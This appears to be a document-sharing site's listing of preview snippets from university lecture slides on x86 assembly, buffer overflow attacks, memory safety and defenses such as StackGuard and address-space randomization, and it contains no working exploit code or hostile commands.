X86 Review Process Layout, ISA, etc. CS642: Computer Security Drew Davidson davidson@cs.wisc.edu From Last Time ACL-based permissions (UNIX style) Read, Write, execute can be restricted on users and groups
More informationAdvanced Buffer Overflow
Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic Engineering
More informationLecture 4 CIS 341: COMPILERS
Lecture 4 CIS 341: COMPILERS CIS 341 Announcements HW2: X86lite Available on the course web pages. Due: Weds. Feb. 7 th at midnight Pair-programming project Zdancewic CIS 341: Compilers 2 X86 Schematic
More informationx86 assembly CS449 Fall 2017
x86 assembly CS449 Fall 2017 x86 is a CISC CISC (Complex Instruction Set Computer) e.g. x86 Hundreds of (complex) instructions Only a handful of registers RISC (Reduced Instruction Set Computer) e.g. MIPS
More informationCS642: Computer Security
Low- level soeware vulnerability protecgon mechanisms CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of Wisconsin CS 642 How can we help
More information4. Jump to *RA 4. StackGuard 5. Execute code 5. Instruction Set Randomization 6. Make system call 6. System call Randomization
04/04/06 Lecture Notes Untrusted Beili Wang Stages of Static Overflow Solution 1. Find bug in 1. Static Analysis 2. Send overflowing input 2. CCured 3. Overwrite return address 3. Address Space Randomization
More informationCMPSC 497 Buffer Overflow Vulnerabilities
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow
More informationBuffer Overflow Attacks
Buffer Overflow Attacks 1. Smashing the Stack 2. Other Buffer Overflow Attacks 3. Work on Preventing Buffer Overflow Attacks Smashing the Stack An Evil Function void func(char* inp){ } char buffer[16];
More informationInject malicious code Call any library functions Modify the original code
Inject malicious code Call any library functions Modify the original code 2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks 2 3 Sadeghi, Davi TU Darmstadt
More informationSoftware Vulnerabilities. Jeff Foster University of Maryland, College Park
Software Vulnerabilities Jeff Foster University of Maryland, College Park When is a Program Secure? When it does exactly what it should! But what is it supposed to do? - Someone tells us (do we trust them?)
More informationQ: Exploit Hardening Made Easy
Q: Exploit Hardening Made Easy E.J. Schwartz, T. Avgerinos, and D. Brumley. In Proc. USENIX Security Symposium, 2011. CS 6301-002: Language-based Security Dr. Kevin Hamlen Attacker s Dilemma Problem Scenario
More informationBUFFER OVERFLOW. Jo, Heeseung
BUFFER OVERFLOW Jo, Heeseung IA-32/LINUX MEMORY LAYOUT Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More informationBuffer Overflow. Jo, Heeseung
Buffer Overflow Jo, Heeseung IA-32/Linux Memory Layout Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationSecure Programming Lecture 5: Memory Corruption III (Countermeasures)
Secure Programming Lecture 5: Memory Corruption III (Countermeasures) David Aspinall, Informatics @ Edinburgh 1st February 2018 Memory corruption recap Buffer overflow is still one of the most common vulnerabilities
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More informationBuffer overflow risks have been known for over 30 years. Is it still a problem? Try searching at to see.
Memory corruption recap Other memory corruption errors Secure Programming Lecture 5: Memory Corruption III (Countermeasures) David Aspinall, Informatics @ Edinburgh 1st February 2018 Buffer overflow is
More informationOn The Effectiveness of Address-Space Randomization. H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004
On The Effectiveness of Address-Space Randomization H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004 Code-Injection Attacks Inject malicious executable code
More informationBuffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu IA-32/Linux Memory Layout Runtime stack (8MB limit) Heap Dynamically allocated storage
More informationSecurity Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40
Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing
More informationCMSC 313 Lecture 12 [draft] How C functions pass parameters
CMSC 313 Lecture 12 [draft] How C functions pass parameters UMBC, CMSC313, Richard Chang Last Time Stack Instructions: PUSH, POP PUSH adds an item to the top of the stack POP removes an
More informationCS 161 Computer Security
Paxson Spring 2011 CS 161 Computer Security Discussion 1 January 26, 2011 Question 1 Buffer Overflow Mitigations Buffer overflow mitigations generally fall into two categories: (i) eliminating the cause
More informationControl Hijacking Attacks
Control Hijacking Attacks Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides from Chris Kruegel) Attacker s mindset Take control of the victim s machine Hijack the execution flow of a running
More informationFunction Call Convention
Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout
More informationMemory safety, continued
Memory safety, continued With material from Mike Hicks and Dave Levin http://images.myhardhatstickers.com/img/lg/h/everybody-safety-hard-hat-label-hh-0115.gif Last time More memory attacks Started: Principled
More informationStack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta
1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)
More informationLecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena
Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall 2007 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov Course Admin
More informationISOLATION DEFENSES GRAD SEC OCT
ISOLATION DEFENSES GRAD SEC OCT 03 2017 ISOLATION Running untrusted code in a trusted environment Setting Possibly with multiple tenants OS: users / processes Browser: webpages / browser extensions Cloud:
More information